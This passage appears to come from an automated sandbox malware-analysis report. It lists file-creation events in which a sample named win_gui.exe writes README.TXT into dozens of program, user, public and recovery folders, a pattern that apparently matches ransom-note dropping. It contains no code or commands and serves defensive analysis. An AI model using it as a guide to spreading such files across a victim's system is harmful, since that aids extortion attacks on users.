Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Microsoft Office 15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Uninstall Information\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\comebadyjeztpncpyfirclwbatysmsxytuegipyfhokwjetyopojcacxlzycfs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\jdownloader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Y:\EFI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\WindowsRE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\jdownloader\config\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Icons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\SciTE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\.ms-ad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\3D Objects\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Contacts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Downloads\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Favorites\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Links\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Music\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\OneDrive\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Recent\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Saved Games\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Searches\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Desktop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Documents\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Downloads\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Favorites\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Links\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Music\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\OneDrive\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Saved Games\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Default\Videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\AccountPictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Desktop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Documents\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Downloads\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Libraries\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Music\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Client\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\loc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\rsodWoW6432\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vreg\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\Icons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\COM\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Geshi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Prettify\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\SciTE\api\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\catalog\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win7\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win8\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\EFOYFBOLXA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\GRXZDKKVDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\HMPPSXQPQV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\JDDHMPCDUJ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\LHEPQPGEWF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\NVWZAPQSQL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\NYMMPCEIMA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\QFAPOWPAFG\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\UNKRLCVOHV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\ZGGKNSUKOP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\EFOYFBOLXA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\EOWRVPQCCS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\GRXZDKKVDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\HMPPSXQPQV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\JDDHMPCDUJ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\LHEPQPGEWF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\NVWZAPQSQL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\NYMMPCEIMA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\QFAPOWPAFG\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\UNKRLCVOHV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\ZGGKNSUKOP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Favorites\Links\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\Camera Roll\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\Saved Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\client\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dtplugin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\plugin2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\javafx\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\jdk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\applet\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\cmm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\deploy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\ext\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\i386\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\management\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Colors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Effects\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\PUB60COR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\Addons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1036\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\3082\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AccessWeb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\Presentation Designs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Common AppData\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\System\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\SystemX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ACCWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AugLoop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\BORDERS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Configuration\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FloodgateExperiences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f14\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f33\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f4\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f7\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000006\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000008\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000009\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000011\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000050\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000055\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000064\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_w1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\README.TXTJump to behavior
